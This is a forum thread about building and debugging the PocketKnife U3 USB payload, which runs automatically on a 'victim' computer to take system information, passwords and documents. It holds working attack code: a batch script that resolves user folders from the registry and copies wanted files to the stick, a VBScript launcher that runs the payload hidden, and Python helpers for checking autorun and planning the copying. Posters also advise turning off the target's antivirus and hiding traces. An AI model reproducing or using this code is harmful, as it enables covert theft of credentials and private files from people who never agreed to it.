USB Pocket-Knife Development


Leapo

Ok, Alex helped me out, but he's away right now.

So I got Pocketknife on my Cruzer Micro. I enabled most of the settings in menu.bat and such, and everything seemed to be fine.

However, when I stuck it in another computer of mine (there was no safety.txt on the C drive), nothing happened. It detected the drive, and I could access the files on it (which were all Pocketknife files), but it did not take any logs.

I noticed no U3 symbol popped up or anything like that. Actually, after I installed the Universal Customizer, the entire U3 program doesn't start when I put the drive in a computer. I thought this was normal, since Universal Customizer replaces it...however, if it removes U3, or at least its program, how is it supposed to auto run, or run at all? Universal Customizer doesn't seem to be an actual program, either. I extracted it to a folder on my desktop, put a flash drive in the computer, ran Universal_Customizer.exe from that desktop folder, and it detected the USB drive, flashed it, and did whatever it does. I cannot find any application that runs Universal Customizer afterwards, though.

I've heard 2 different ways to install Pocketknife. One apparently involves moving an .iso to the Universal Customizer folder. The other, which alexthedrifter helped me do over MSN, was just dragging and dropping the Leapo's Payload/U3 Devices/Flash Partition/ folder to the root of my flash drive.

But it's not working. Actually, the whole Universal Customizer in general confuses me. Why do I even need it for Pocketknife? I just dragged and dropped the folder. There is no Universal Customizer folder or files on my flash drive. I didn't add Pocketknife using the Universal Customizer program, which, from what I can see, doesn't even exist.

I'm very confused.


Ok, Yes, we *do* expect everybody to read all 29 pages of this thread. When I found this forum I read all the pinned threads. (they're pinned for a reason) I also read about half the other threads. There's all kinds of things to learn there.

This goes against my better judgment, but...

When you install the Universal Customizer, it puts a "Universal_Customizer" directory in C:\. Inside that directory you will find a few sub-directories.

Before you do anything, create a text file in C:\ and name it "safety.txt" That'll keep you from hosing yourself.

If you wanna do a payload from source files.

Empty the "c:\Universal_Customizer\U3CUSTOM\" sub-directory. Leapo's payload has two parts, a "U3 ISO Source" directory and a "Flash Partition" directory. Everything in the U3 ISO Source directory gets copied into "c:\Universal_Customizer\U3CUSTOM\". Then double click on "c:\Universal_Customizer\ISOCreate.cmd". That will run a batch file that will create the .ISO file and put it where it belongs.

If you have a .iso file, rename it "U3CUSTOM.ISO" and move it into "c:\Universal_Customizer\bin".

In either case, have your U3 thumb drive already plugged in and click on "Universal_Customizer.exe" (you'll find it in "c:\Universal_Customizer\"). Follow the instructions *exactly*, especially the bit at the end where it has you extract the thumb drive and re-insert it. I don't think it matters if you close the window first, but I always extract, re-insert, then close the customizer.

NOTE: Some payloads don't have anything to copy to the non-U3 partition of your thumb drive. Gonzor's and Leapo's do.

For Leapo's, copy the contents of the "Flash Partition" sub-directory (that I mentioned above) to the second partition on the thumb drive. Open the non-U3 partition and run "Menu.bat" to configure the payload.

For Gonzor's, copy "SBConfig-V2.0.18.exe" (or whatever the current version is) to the non-U3 partition and run it.

Here's a tip if you're re-flashing a thumb drive. Delete the logs from the flash partition. One of the steps that the Universal Customizer does is to archive and restore the flash partition. Sometimes there are files in the logs that don't make it through that process. Better to get rid of them first.


I did read through the thread. I understand we are expected to do so. However, there was no clear-cut guide on how to actually install it on any page of the thread.

I understand that they're sort of assuming people know how to use the Universal Customizer and how to burn .iso's to a flash drive's U3 partition. However, I didn't. I'm quite new to U3 and USB hacks in general, so I was just a bit confused.

After reading what you've said, and talking to Alex, who simplified it for me for a little, I think I was able to successfully install it. However, it still doesn't seem to work. At least, not on the computer I put it in.

I left it in for about 3 minutes.

I took it out of that computer and put it back in my computer with safety.txt. As soon as I put the flash drive back in, a message popped up in the bottom right saying there was some sort of write error, and data was lost. It was kind of confusing and didn't last long enough for me to write it down fully.

Anyway, I looked through the flash drive, but the LOGS folder, and other folders, were empty. It didn't appear to capture anything.

Both computers have XP. The victim computer's antivirus did not seem to detect or stop it.

After trying it again, the weird error didn't pop up when I put it back in my main computer, but still, no logs. Is it possible that it simply isn't finishing? I think I remember it saying in Menu.bat that it will pop open the "Logs" folder when it finishes. Well, that doesn't happen. I've waited quite a while though...

Is there any way to tell if the payload is actually extracting passwords and such from a target computer?


Things to try:

On your safetyed machine, run Menu.bat and disable everything. Turn on system information.

On your target machine, turn off the antivirus. (the AVKill feature isn't working right now. We're working on it)

On your target machine, verify that autorun is turned on. (I don't remember how to check that)

*Then* stick your thumb drive in.

Please report back what happened.

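A way to answer the "verify that autorun is turned on" step in the post above, as an added example that is not part of the original thread or of the PocketKnife payload. Windows decides per drive type with the NoDriveTypeAutoRun DWORD under Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (a value under HKLM overrides the one under HKCU; a set bit disables AutoRun for that drive type; 0x20 is CD-ROM, which is what the U3 partition reports, and 0x04 is removable disk, the flash partition). The reg query output strings in the block are constructed samples, not captured from a real host, and the 0x91 fallback is the default XP applies when the value is absent. Note that later Windows updates stopped honouring autorun.inf on non-optical media regardless of this value, so on a patched host only the CD-ROM bit matters for a U3 launcher.

```python
"""Decode Windows' NoDriveTypeAutoRun policy to tell whether AutoRun is allowed for the
two drive types a U3 stick presents: a CD-ROM partition (carrying autorun.inf) and a
removable-disk partition.

Added example, not part of the original thread or of the PocketKnife payload.
On a real box the inputs come from:
  reg query "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoDriveTypeAutoRun
  reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer" /v NoDriveTypeAutoRun
"""
import re

# A set bit in NoDriveTypeAutoRun means AutoRun is DISABLED for that drive type.
DRIVE_BITS = {
    0x01: "DRIVE_UNKNOWN",
    0x02: "DRIVE_NO_ROOT_DIR",
    0x04: "DRIVE_REMOVABLE",   # the flash (writable) partition of a U3 stick
    0x08: "DRIVE_FIXED",
    0x10: "DRIVE_REMOTE",
    0x20: "DRIVE_CDROM",       # the U3 "CD-ROM" partition that carries autorun.inf
    0x40: "DRIVE_RAMDISK",
    0x80: "RESERVED",
}
XP_DEFAULT = 0x91  # default applied by XP when the policy value is absent (unknown, remote, reserved disabled)

_LINE = re.compile(r"NoDriveTypeAutoRun\s+REG_DWORD\s+0x([0-9A-Fa-f]+)")


def parse_reg_query(output: str):
    """Return the DWORD from `reg query ... /v NoDriveTypeAutoRun` output, or None if the value is absent."""
    m = _LINE.search(output)
    return int(m.group(1), 16) if m else None


def effective_policy(hklm_output: str, hkcu_output: str) -> int:
    """The machine policy (HKLM) takes precedence over the per-user one (HKCU); neither set means the default."""
    for out in (hklm_output, hkcu_output):
        value = parse_reg_query(out)
        if value is not None:
            return value
    return XP_DEFAULT


def autorun_status(value: int) -> dict:
    """Map each drive type to True when AutoRun is allowed (bit clear) for that type."""
    return {name: not (value & bit) for bit, name in DRIVE_BITS.items()}


def u3_can_autorun(hklm_output: str, hkcu_output: str) -> bool:
    """Will the autorun.inf on the U3 CD-ROM partition be processed on this host?"""
    return autorun_status(effective_policy(hklm_output, hkcu_output))["DRIVE_CDROM"]


# Constructed sample output, modelled on reg query's format (not captured from a real host).
HKLM_NOT_SET = "ERROR: The system was unable to find the specified registry key or value."
HKCU_DEFAULT = (
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\n"
    "    NoDriveTypeAutoRun    REG_DWORD    0x91\n"
)
HKLM_ALL_OFF = (
    "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\n"
    "    NoDriveTypeAutoRun    REG_DWORD    0xff\n"
)

if __name__ == "__main__":
    for label, hklm, hkcu in (("default", HKLM_NOT_SET, HKCU_DEFAULT),
                              ("hardened", HKLM_ALL_OFF, HKCU_DEFAULT)):
        value = effective_policy(hklm, hkcu)
        status = autorun_status(value)
        print(f"{label}: NoDriveTypeAutoRun=0x{value:02x} "
              f"cdrom={status['DRIVE_CDROM']} removable={status['DRIVE_REMOVABLE']}")
```

If u3_can_autorun() comes back False on a target, no amount of fiddling with Menu.bat will make the launcher start: the U3 autorun.inf is never processed, and the payload has to be started by hand (double-clicking the launcher) instead.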

Things to try:

On your safetyed machine, run Menu.bat and disable everything. Turn on system information.

Okay.

On your target machine, turn off the antivirus. (the AVKill feature isn't working right now. We're working on it)

Okay.

On your target machine, verify that autorun is turned on. (I don't remember how to check that)

I also do not know how to check this. =/

*Then* stick your thumb drive in.

Please report back what happened.

Okay, with the anti virus disabled, and with only "dump system information" enabled in Menu.bat...

I stuck it in and nothing seemed to happen. By nothing, I mean there was no "do you want to explore the folder of this removable device" message, nor any sort of U3 pop-up or message. I waited for a few minutes, took it out. I put it back in the computer with safety.

There's a file in my LOGS folder with all the system information of...the computer with the safety??

I'm very confused. I put it in the target computer with anti-virus disabled, and nothing happened. Then, when I put it back into my safety'd computer, I see a log of MY computer, not the victim one.

Ironically, the computer with the safety has the complete Eset Smart Security, all enabled. And yet, it captures the info of THAT computer, with safety.txt and an enabled and good anti-virus, yet cannot capture the info of a computer with no safety, and the anti-virus completely disabled? Why is it even capturing the info of my safety'd computer?

To explain just how ridiculous this all is, let me simplify it:

1. I stick USB drive into victim computer.

2. I check the LOGS folder on that computer...nothing.

3. I stick it back into my computer with safety.

4. A file is instantly created in LOGS with the computer info of the computer it is currently in. My main computer; my safety'd one.

So, it appears that even though I do not want it to get the info of my main computer, it retrieves it any time I stick the USB drive in it, even though it has safety.txt on C:, and yet, when I put it in the computer with anti-virus completely disabled and no safety.txt, it does not capture any of its info and does not create a LOGS file of it.

Is there any chance we could talk over some sort of instant messaging program? Telling you for me to test something, and then me giving you the results, and then you telling me to do something else, and me giving the results, etc. etc. could take many days, since both of us are not checking this thread every minute.


Okay, I've tested it on 3 different computers now: One Vista, 2 XP. The Vista one is 64-bit, the 2 XP ones are 32-bit. I'm getting some really strange results overall. The payload seems to work, sort of, but not consistently, and not how it should. Including capturing passwords and system info of my Vista computer, even with safety.txt on the C: drive. Yet, it will only capture passwords on one of the XP computers with safety.txt not on the C: drive. The other, it will not log anything, with or without safety.txt.

It's pretty much impossible to communicate everything I've done and then also respond to questions over a message board like this, so I'd very much prefer if someone could contact me over AIM or MSN over this.

AIM screenname = TheWoWLawyer

MSN screenname = wowlawyer@bendblizzpolicy.com

Thanks.


I have been working on integrating some of the code from the last few days (Slurp3 and Recovery Paths Method) into Leapo's payload (for copying and pasting into Start.bat).

We must create a txt file called wanted.txt in the CONFIG directory of our USB.

A file called Slurp3.cfg must be created in the CONFIG directory of our USB.

The contents of the wanted.txt file can be, for example (one line for each extension):

*.txt
*.doc
*.xls
*.xml
*.jpg

Once the wanted.txt file has been created or modified, just run the following code. It recovers the wanted paths for your Slurp3 desired files (from My Documents, Desktop, Shared Documents and Shared Desktop, or any other non-default directories).

:: By DMilton for free community
:: Oriented Slurping Method using Recovery Paths Method
:: Thread http://hak5.org/forums/index.php?showtopic=6746
:: Checks the state of Slurp3.cfg
:: Sets some variables that are needed (must be added to the initial variable settings).
:: Note: ActualUser, Common and TmpReg (exported registry branches and a temporary file) are routed to the %temp% path to make the batch run faster.
@echo off
set ActualUser="%temp%\ActualUser.dat"
set Common="%temp%\Common.dat"
set TmpReg=%temp%\tmpval.dat
set SlurpDir=%logdir%\Slurp_Data
set Wanted=%config:"=%wanted.txt

:: The next lines can be added, for example, after the variable declarations
:: Erase the temporary files if they exist (REG EXPORT would otherwise prompt before overwriting)
if exist %ActualUser% del /F /Q %ActualUser%
if exist %Common% del /F /Q %Common%
if exist %TmpReg% del /F /Q %TmpReg%
:: Exporting keys
:: The recovered paths serve both the Slurp2 and Slurp3 configurations, so check for either first
IF EXIST %config%\Slurp2.cfg GOTO SetSlurpVars
IF EXIST %config%\Slurp3.cfg GOTO SetSlurpVars
GOTO SkipSlurpVars

:SetSlurpVars
:: "Shell Folders" holds the resolved paths of the special folders, wherever they were relocated to:
:: HKLM for the All Users (shared) folders, HKCU for the folders of the logged-on user
REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
if not %errorlevel%==0 goto ErrSetVars
REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
if not %errorlevel%==0 goto ErrSetVars

:: Create a temp file containing only the four values we are interested in
type %ActualUser% | find "Personal" >> %TmpReg%
type %ActualUser% | find "Desktop" >> %TmpReg%
type %Common% | find "Common Documents" >> %TmpReg%
type %Common% | find "Common Desktop" >> %TmpReg%

:: Each exported line looks like "Personal"="C:\\Documents and Settings\\user\\My Documents":
:: token 1 is the value name and token 2 the path (backslashes doubled), both still quoted,
:: so each reaches :FOUND as a single argument
FOR /F "tokens=1,2* delims==" %%I IN (%TmpReg%) DO call :FOUND %%I %%J
IF NOT DEFINED MyD goto ErrSetVars

:: Deleting temporary files
del /F /Q %ActualUser%
del /F /Q %Common%
del /F /Q %TmpReg%
goto :Continue

:FOUND
:: Called once per exported line: %1 = value name, %2 = path (the quotes are removed with %~)
:: It collapses the doubled backslashes of the .reg syntax and stores the path in the matching variable,
:: so the result does not depend on the order in which the lines were found
IF "%~2"=="" GOTO :EOF
SET "RegKey=%~2"
SET "RegKey=%RegKey:\\=\%"
IF /I "%~1"=="Personal" SET "MyD=%RegKey%"
IF /I "%~1"=="Desktop" SET "Dsk=%RegKey%"
IF /I "%~1"=="Common Documents" SET "ShDoc=%RegKey%"
IF /I "%~1"=="Common Desktop" SET "ShDsk=%RegKey%"
GOTO :EOF

:LastElem
:: %1 = full path (quoted), %2 = name of the variable that receives its last element.
:: The ~nx modifier returns name and extension of the last path component at any depth,
:: so "C:\Documents and Settings\user\My Documents" gives "My Documents"
FOR %%P IN ("%~1") DO SET "%~2=%%~nxP"
GOTO :EOF

:ErrSetVars
:: Nothing usable could be recovered from the registry: clean up and skip the oriented slurping
if exist %ActualUser% del /F /Q %ActualUser%
if exist %Common% del /F /Q %Common%
if exist %TmpReg% del /F /Q %TmpReg%
GOTO SkipSlurp3

:Continue
:SkipSlurpVars
:: In order to integrate this stuff into Leapo's, the next lines must be added after ":SkipSlurp2"
IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3

:StartSlurp3
:: Creates the directory structure for the wanted files option if it does not exist
:: (useful too for simplifying the Slurp2 routine, not done now).
:: The destination folders keep the original folder names ("My Documents", "Desktop", or whatever
:: the user called them), prefixed with the user they belong to, so the files are slurped with
:: the same structure as the original folders
CALL :LastElem "%MyD%" LastDir
SET "DestMyD=%USERNAME%_%LastDir%"
CALL :LastElem "%Dsk%" LastDir
SET "DestDsk=%USERNAME%_%LastDir%"
CALL :LastElem "%ShDsk%" LastDir
SET "DestShDsk=AllUsers_%LastDir%"
CALL :LastElem "%ShDoc%" LastDir
SET "DestShDoc=AllUsers_%LastDir%"

:CreateFolders
IF NOT EXIST "%SlurpDir%\%DestMyD%" mkdir "%SlurpDir%\%DestMyD%"
IF NOT EXIST "%SlurpDir%\%DestDsk%" mkdir "%SlurpDir%\%DestDsk%"
IF NOT EXIST "%SlurpDir%\%DestShDsk%" mkdir "%SlurpDir%\%DestShDsk%"
IF NOT EXIST "%SlurpDir%\%DestShDoc%" mkdir "%SlurpDir%\%DestShDoc%"

:: Copying the desired files with the same structure as the original
:: (/I treats the destination as a directory, /Y suppresses the overwrite prompt that would hang a hidden payload)
for /F "usebackq" %%a in ("%Wanted%") do (
xcopy "%MyD%\%%a" "%SlurpDir%\%DestMyD%" /H /S /D /C /I /Y
xcopy "%Dsk%\%%a" "%SlurpDir%\%DestDsk%" /H /S /D /C /I /Y
xcopy "%ShDsk%\%%a" "%SlurpDir%\%DestShDsk%" /H /S /D /C /I /Y
xcopy "%ShDoc%\%%a" "%SlurpDir%\%DestShDoc%" /H /S /D /C /I /Y
)

    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +    [Wanted files were copied]    + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1

:SkipSlurp3

For an independent batch (or as a proof of concept of this code), the only thing you need is to declare the config and logdir variables at the beginning of the batch.

You can do it by copying and pasting the code into a batch (name it as you want) and adding these two variables to the beginning of it:

set config="[your usb letter]:\CONFIG\"
SET logdir=[your usb letter]:\SLURP3

Note that in the original Leapo's payload, both variables are declared. In Leapo's, logdir is between brackets; it will probably cause some minor bugs, as I have tested only the "Proof of Concept" batch.

What about integrating this on next version, Leapo? ;)

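The same Recovery Paths Method worked through in Python, as an added example that is not DMilton's or Leapo's code: it reads the four folder paths out of an exported "Shell Folders" branch, derives the destination folder names the way the batch does (<user>_<last path element> for the user's folders, AllUsers_<last path element> for the shared ones) and expands a wanted.txt into one copy job per folder and pattern. The .reg text is constructed sample input in the format reg export writes, the user name "alice" and the relocated My Documents on D: are assumptions chosen to show the non-default-directory case, and the E:\LOGS path stands in for whatever letter the flash partition gets.

```python
"""Recovery Paths Method: resolve My Documents / Desktop / Shared Documents / Shared Desktop
from an exported "Shell Folders" registry branch and plan the copies for a wanted.txt.

Added example, not DMilton's or Leapo's code. The .reg text and the user name are
constructed assumptions; nothing here touches a real registry or file system.
"""
import ntpath
import re

# value name in "Shell Folders"  ->  variable name used by the batch
WANTED = {"Personal": "MyD", "Desktop": "Dsk", "Common Documents": "ShDoc", "Common Desktop": "ShDsk"}
_REG_LINE = re.compile(r'^"([^"]+)"="(.*)"$')  # "name"="REG_SZ data" lines only


def parse_shell_folders(reg_text: str) -> dict:
    """Return {value name: path} from a .reg export; \\\\ is the .reg escape for one backslash."""
    folders = {}
    for line in reg_text.splitlines():
        m = _REG_LINE.match(line.strip())
        if m:
            name, data = m.groups()
            folders[name] = data.replace("\\\\", "\\")
    return folders


def recover_paths(hkcu_reg: str, hklm_reg: str) -> dict:
    """Pick the four folders, keyed like the batch's variables (MyD, Dsk, ShDoc, ShDsk)."""
    merged = {**parse_shell_folders(hklm_reg), **parse_shell_folders(hkcu_reg)}
    return {var: merged[name] for name, var in WANTED.items() if name in merged}


def dest_name(var: str, path: str, username: str) -> str:
    """<user>_<last element> for the user's folders, AllUsers_<last element> for the shared ones."""
    last = ntpath.basename(path.rstrip("\\"))
    prefix = username if var in ("MyD", "Dsk") else "AllUsers"
    return f"{prefix}_{last}"


def copy_jobs(paths: dict, wanted_txt: str, slurp_dir: str, username: str) -> list:
    """One (source pattern, destination directory) tuple per folder and wanted pattern."""
    patterns = [p.strip() for p in wanted_txt.splitlines() if p.strip() and not p.startswith(";")]
    jobs = []
    for var, path in paths.items():
        dest = ntpath.join(slurp_dir, dest_name(var, path, username))
        for pat in patterns:
            jobs.append((ntpath.join(path, pat), dest))
    return jobs


# Constructed sample exports (format of `reg export`, backslashes doubled as in a .reg file).
HKCU_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies"="C:\\Documents and Settings\\alice\\Cookies"
"Desktop"="C:\\Documents and Settings\\alice\\Desktop"
"Personal"="D:\\Data\\alice docs"
'''

HKLM_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData"="C:\\Documents and Settings\\All Users\\Application Data"
"Common Desktop"="C:\\Documents and Settings\\All Users\\Desktop"
"Common Documents"="C:\\Documents and Settings\\All Users\\Documents"
'''

WANTED_TXT = "*.txt\n*.doc\n*.xls\n"

if __name__ == "__main__":
    paths = recover_paths(HKCU_REG, HKLM_REG)
    for src, dst in copy_jobs(paths, WANTED_TXT, "E:\\LOGS\\Slurp_Data", "alice"):
        print(f'xcopy "{src}" "{dst}" /H /S /D /C /I /Y')
```

The point the batch comments make, that My Documents may live anywhere ("D:\Data\alice docs" here), is why the paths come from "Shell Folders" rather than from a hard-coded %USERPROFILE%\My Documents; the merge puts HKCU last so a per-user value always wins over a machine-wide one of the same name.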

Well, I've decided I'm going to start learning how to use RubyGTK, and what better project to add to than this one? I'll be reading up on it and trying to make a GUI of menu.bat for those who want it.

I think it's a VERY, VERY GOOD idea. I will be waiting for it while doing other things I have in mind... ;)

Have you read X3N's posts about a GUI in AutoIT? You can find them at http://hak5.org/forums/index.php?act=findp...&pid=101889

X3N:

How far have you got with it? Are you going to publish the code for the GUI?


I'll ask just this one more time, because it's still confusing me greatly:

Can anyone think of why PocketKnife would slurp the info and passwords of a computer it is put in, even though safety.txt is in the C: drive? And yet, when I put it in a computer with anti-virus disabled and no safety.txt, it does not obtain any of its info. Only my 3rd computer acts how it should; slurps info if safety.txt is not on C:, doesn't slurp if it is on C:.

I suppose there are numerous possible reasons for why it wouldn't get any info from that computer, but I find it baffling that it IS getting the info on a computer with safety.txt.

Just as a note, the computer I'm putting it in, with safety.txt, is Vista Home Premium 64-bit. I can't see why it'd be having problems with the safety just because it's Vista (or x64), but it's definitely bypassing the safety. Also, I am 100% sure the option to "ignore safety.txt" is disabled.


Have you read X3N's posts about a GUI in AutoIT?

Sadly, his post isn't exactly useful to me, but if X3N posts up his source, that may help. If I can see how he goes about doing some things that would help me. Also, I could try to copy his design so we have a unified GUI design. Then, if anybody else wants to make a GUI, perhaps in PyGTK, they would not have to come up with a design, merely code.

So far, after 1hr of tutorial reading, this is the best I can do: 8424816.png


Then we'll be waiting for X3N's response!

I have many things in mind, one of them is making a GUI too, but the problem is the time... When I finish some new stuff I am working on for this payload, I'll study the idea of helping with a GUI... Now you know more than me about Ruby! That was your "Hello world!" button! :P


haha sorry guys, I didn't write a GUI for my payload, just the rest of the code, because it's a lot cleaner than .bat. I am writing a GUI for a new ISO customizer that works in Vista using the lpinstaller program, which I have almost finished, but I'm in the process of moving so it's been hard to get a lot done. I've kinda been holding back on releasing the code for the main payload but will release everything when it's finished. I am creating an entire development environment that should be super easy to use.


Hi guys, first of all I'm new here, so I apologize if I'm out of boundaries and for my not-so-good english.

I'm a programmer and student of Computer Engineering, specializing in Networks and Security, and this "USB Payload/SwitchBlade/Hacksaw/..." caught my attention, so I made some scripts with nirsoft stuff.

I recently got a U3 drive so I looked at Gonzor and PocketKnife alternatives.

Now, thinking as a hacker, if you really want to perform an attack, it should be as fast and silent as possible.

So this means NO U3 software; use portable software on the flash drive partition, use PortableApps if you feel lazy.

Use only one configuration file and one script file.

(You can still have profiles and all the choices you can handle, but the configuration used for the "current" attack should be packed into one file)

Should consider copying the raw data from passwords instead of breaking them, as it consumes time, this can be done at your own computer.

By default it opens the logs directory when done... (WTF?)

It should open the root directory, as this is the default behavior of a USB drive.

All information about the attack should at least be hidden: logs, config, menu.bat.

So that the difference of a "normal" USB drive and ours, should only be a delay, hopefully not noticeable.

I took a quick look at the scripts and I feel that it's wasting a lot of time, I would like to try to recode it focusing on my ideas, how should I publish it?

As for the errors when Windows doesn't find the file: it's about the Start.bat file, not Go.vbs. Changing the code to:

' Go.vbs: started by the U3 autorun; it locates the payload's Start.bat on the flash
' (writable) partition of the stick, whatever drive letter that partition was given
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
Set objEnv = objShell.Environment("PROCESS")

' Timestamp handed to Start.bat through the process environment (zero-padded to two digits)
objEnv("Year") = Year(now())
objEnv("Month") = Right("0" & Month(now()), 2)
objEnv("Day") = Right("0" & Day(now()), 2)
objEnv("Hour") = Right("0" & Hour(now()), 2)
objEnv("Minute") = Right("0" & Minute(now()), 2)
objEnv("Second") = Right("0" & Second(now()), 2)

' Scan every ready drive for \SYSTEM\Start.bat and run it hidden (window style 0)
' without waiting for it to finish; IsReady skips empty card readers and floppy drives
For Each objDrive in colDrives
    If objDrive.IsReady Then
        strPath = objDrive.Driveletter & ":\SYSTEM\Start.bat"
        If objFSO.FileExists(strPath) Then
            objShell.Run strPath, 0, False
        End If
    End If
Next

Will solve this problem, although there are other details...

(You can place a copy of GO.VBS at the normal drive partition to try it out by double click)

Is there a way to flash the u3 partition without backing up and restoring the drive?


Hi guys, first of all I'm new here, so I apologize if I'm out of boundaries and for my not-so-good english.

Don't worry, you are not the only one who doesn't speak English (I'm Spanish). If I can understand you (my English is poorer than yours), everybody can do it! ;) You're welcome.

Now, thinking as a hacker, if you really want to perform an attack, it should be as fast and silent as possible.

I agree :P

(You can still have profiles and all the choices you can handle, but the configuration used for the "current" attack should be packed into one file)

Do you mean using only one config file for all the stuff? As in using a general config file? Will this reduce the payload's time consumption? :unsure:

Should consider copying the raw data from passwords instead of breaking them, as it consumes time, this can be done at your own computer.

No passwords are broken while the payload runs... It only extracts the hashes for further work at our own computer. :blink:

By default it opens the logs directory when done... (WTF?)

It should open the root directory, as this is the default behavior of a USB drive.

All information about the attack should at least be hidden: logs config menu.bat

So that the difference of a "normal" USB drive and ours, should only be a delay, hopefully not noticeable.

I think it'll be less suspicious too... ;)

I took a quick look at the scripts and I feel that it's wasting a lot of time, I would like to try to recode it focusing on my ideas, how should I publish it?

I think the best way to publish it is to publish it here! It's an easy way to help and to let others develop it.

And about the errors when windows doesn't find the file, it's about the Start.bat file, not the Go.vbs, changing the code to:
:o

Is there a way to flash the u3 partition without backing up and restoring the drive?

I think Leapo was working on it but I don't know what his current progress on it is...

Good work. We'll be waiting for your work on this and, of course, your contributions: cleaning the code, developing new stuff, making it faster, programming a GUI or whatever you want... :lol:

@X3N: All contributions are good contributions!

@alexthedrifter: I think so... :P


Tell me what you want done. I don't fully understand how a payload works, so tell me if you want it to run a program with parameters or something.

The thing we need (it isn't really needed, but would be very useful) is a GUI (better an open-source GUI, so everybody can understand how it is done) with basically enable/disable options for all the payload's stuff.

There is a very good GUI from GonZor, who made one, but he is not updating his payload and nowadays Leapo's comes with more stuff. Anyway, there are many people trying to improve Leapo's payload. You can see what GonZor's does to understand what is needed; I think it is a very good and easy-to-use GUI.

Actually the payload runs basically by looking at the \CONFIG directory to see the state of a multitude (around 40) of files. That is, if a file is found, the payload runs a piece of code; if it isn't, it omits the piece of code.

Doing a GUI can clean up the code too, not using so many configuration files, but only a few.

Once the GUI is started, what is needed is to change these few files (or parameters) to be used by the start.bat file (the payload itself), allowing the user to select what will run or not in the next use of the payload.

Leapo's has a GUI itself, but it has been made in the DOS shell (menu.bat). It's good, but a Windows-style GUI will be better.


Do you mean using only one config file for all the stuff? As using a general config file? Will this reduce the payload time consumption? :unsure:

I mean you can use all the config files you want, one for each script, profiles, etc... But when you have your attack planned, you should be able to save it and create a config file for it.

I thought the script looked into each .cfg file and read parameters from it, but it only does this with 8 of them (of approx. 40 cfg files), so I think it's not a big deal. With the other cfg files, it just checks if they exist. So in order to try out my approach I'll have to recode it all B) Like a pocket-knife alternate version, haha, I'll think about that.

No passwords are broken during function of the payload... It only extracts the hashes for further work at our own computer. :blink:

Well, when I open the log files the passwords appear in clear text, no hashes. This won't consume a lot of time as it's proportional to the weakness of the passwords, and well, we know most of them are weak, but still it's time.

Anyway, there are a LOT of errors in the code and I'm seriously considering developing it.

Do we have access to the Universal Customizer code? Backing up and restoring the whole drive is just a waste of time when developing.

@alexthedrifter: Can you call MS-DOS instructions from VBS? I mean something like MS.run("ver|%windir%\system32\find.exe '5.2.' ") ?


@mencargo Yes I can.

edit:

@Verye check in your settings; there is a setting to turn off its checking for it.

edit2: Here is a snippet of code.

Process.Start("cmd.exe", " /K cd c:\")

This opens command prompt, and changes its directory to C:\

You can change cmd.exe to like /folder/folder2/program.bat and enter the parameters in the next section of code.

If you guys could do that because I don't fully understand how payloads work I'll be sure to use it and accredit you for it.

Edit3: Before you do all of them post 1 or 2 so I can make sure it properly works.

